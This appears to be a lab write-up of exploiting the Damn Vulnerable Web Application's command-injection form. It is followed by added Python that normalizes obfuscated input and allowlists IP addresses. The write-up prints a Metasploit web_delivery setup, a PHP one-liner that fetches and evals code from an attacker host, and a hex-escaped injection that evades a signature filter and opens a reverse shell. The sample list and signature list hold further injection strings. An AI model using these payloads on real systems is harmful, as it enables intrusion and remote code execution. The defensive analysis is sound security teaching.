Hello, today I played with Damn Vulnerable Web Application (DVWA), which was deployed in AWS. The objective is to execute commands and gain access as the root user.
First I go to the "Command Injection" option and execute a ping to 8.8.8.8; that IP address belongs to Google and was only used to validate the Internet connection.
Now I try to execute two commands with the help of the pipe "|".
The command executed without errors, so we can try other commands, for example a reverse connection to a remote Kali Linux.
In Kali Linux open msfconsole and build the payload by executing the following commands:
- sudo msfconsole
- use exploit/multi/script/web_delivery
- show targets
- set target 1
- set payload php/meterpreter/reverse_tcp
- set lhost 18.188.109.166 (Kali hosted in AWS)
- set lport 4444
```
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://18.188.109.166:8080/LvtZ8HfQGHYG', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
```
Now I launch Burp Suite to send the command; on the first try I get a 403 code.
On the second try I sent the command encoded and got the same 403 code.
Then I sent the command encoded 7 times and got the same 403 code.
The goal is to reconstruct the PHP functions and the URL at runtime, without literally writing `eval`, `assert`, or `file_get_contents`, and also to encode the URL in hexadecimal.
We will use:
- `chr()` to generate the strings `assert` and `file_get_contents` from their ASCII values.
- `\xHH` (hex escape) within a PHP string for the URL.
- `$` escaping so that the shell doesn't interpret the variables as its own.
On the Kali Linux machine, msfconsole shows one session generated by meterpreter, so I can execute any command on this DVWA server.
```
127.0.0.1; php -d allow_url_include=1 -r "\$u=\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x31\\x38\\x2e\\x31\\x38\\x38\\x2e\\x31\\x30\\x39\\x2e\\x31\\x36\\x36\\x3a\\x38\\x30\\x38\\x30\\x2f\\x67\\x38\\x31\\x4c\\x37\\x66\\x67\\x45\\x59\\x38\";include \$u;"
```
In the msfconsole terminal I get a reverse shell of DVWA through port 444, so I can execute all the commands included in msfconsole.
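The 403 responses above show a filter matching the literal strings `eval`, `file_get_contents` and the URL, while the `\xHH` and `chr()` rebuilds pass because the filter inspects the raw bytes. The defensive lesson is that signature matching has to run on a normalized value (repeated URL-decoding, PHP hex escapes, `chr()` chains decoded), and that for a field that should only ever hold an IP address a positive allowlist makes the signature list unnecessary. The Python below is an added example written for this page, not code from the write-up or from DVWA; the request values in `SAMPLE_REQUESTS` are constructed for the example, and the function names (`normalize`, `analyze_ping_param`, `is_allowed_target`) are hypothetical.

```python
"""Normalize obfuscated command-injection input before matching signatures.

Added example for the DVWA write-up above. A filter that only looks at the
raw parameter misses payloads whose function names and URL are rebuilt at
runtime; decoding first makes the original strings visible again.
"""
import ipaddress
import re
from urllib.parse import unquote

# Strings a ping form should never need to see once the input is decoded.
SUSPICIOUS = (
    "eval(", "assert(", "file_get_contents", "include ", "php -r",
    "allow_url_include", "allow_url_fopen", "http://", "https://",
)
# Shell metacharacters that chain a second command onto the ping target.
SHELL_SEPARATORS = re.compile(r"[;|&`$]")

# Constructed request values for the example (not captured traffic):
SAMPLE_REQUESTS = [
    "8.8.8.8",                                   # legitimate target
    "127.0.0.1%7Cwhoami",                        # single URL-encoding of "|"
    "127.0.0.1%25257Cid",                        # triple URL-encoding of "|"
    # PHP hex escapes hide the scheme; double backslashes as seen in a shell quote
    '127.0.0.1; php -r "$u=\\"\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\";include $u;"',
    # chr() chain spelling a function name
    "chr(97).chr(115).chr(115).chr(101).chr(114).chr(116)($c)",
]


def url_decode_fully(value, max_rounds=10):
    """Apply percent-decoding until the value stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_php_hex(value):
    """Turn \\xHH (or \\\\xHH as written inside shell quotes) into characters."""
    return re.sub(r"\\{1,2}x([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), value)


def decode_chr_chain(value):
    """Collapse chr(97).chr(115)... into the string it builds."""
    chain = re.compile(r"chr\(\s*\d{1,3}\s*\)(?:\s*\.\s*chr\(\s*\d{1,3}\s*\))*")

    def rebuild(match):
        codes = re.findall(r"chr\(\s*(\d{1,3})\s*\)", match.group(0))
        return "".join(chr(int(c)) for c in codes if int(c) < 256)

    return chain.sub(rebuild, value)


def normalize(value):
    """Decoding order: URL layers first, then PHP-level escapes, then chr()."""
    value = url_decode_fully(value)
    value = decode_php_hex(value)
    value = decode_chr_chain(value)
    return value.lower()


def analyze_ping_param(ip_param):
    """Return (verdict, normalized_value, reasons) for one form submission."""
    reasons = []
    norm = normalize(ip_param)
    if SHELL_SEPARATORS.search(norm):
        reasons.append("shell metacharacter present after decoding")
    for sig in SUSPICIOUS:
        if sig in norm:
            reasons.append(f"signature {sig!r} visible after normalization")
    return ("block" if reasons else "allow", norm, reasons)


def is_allowed_target(ip_param):
    """Positive validation: accept only a literal IPv4 address.

    For a ping form this allowlist is the real fix; the signature list above
    only explains why the raw-byte filter in the write-up was bypassed.
    """
    try:
        ipaddress.IPv4Address(ip_param)
        return True
    except ValueError:
        return False


def run_samples():
    """Evaluate every constructed sample; returns [(raw, verdict), ...]."""
    return [(raw, analyze_ping_param(raw)[0]) for raw in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for raw, verdict in run_samples():
        print(f"{verdict:5}  allowlist={is_allowed_target(raw)!s:5}  {raw}")
```

The decode order matters: percent-decoding is the transport layer, so it is peeled first and repeatedly (bounded, so a long chain of `%25` prefixes cannot be used to exhaust the filter), and only then are the PHP-level `\xHH` escapes and `chr()` chains resolved. The allowlist check is independent of all of that, which is why it is the stronger control for a field whose only legitimate content is an address.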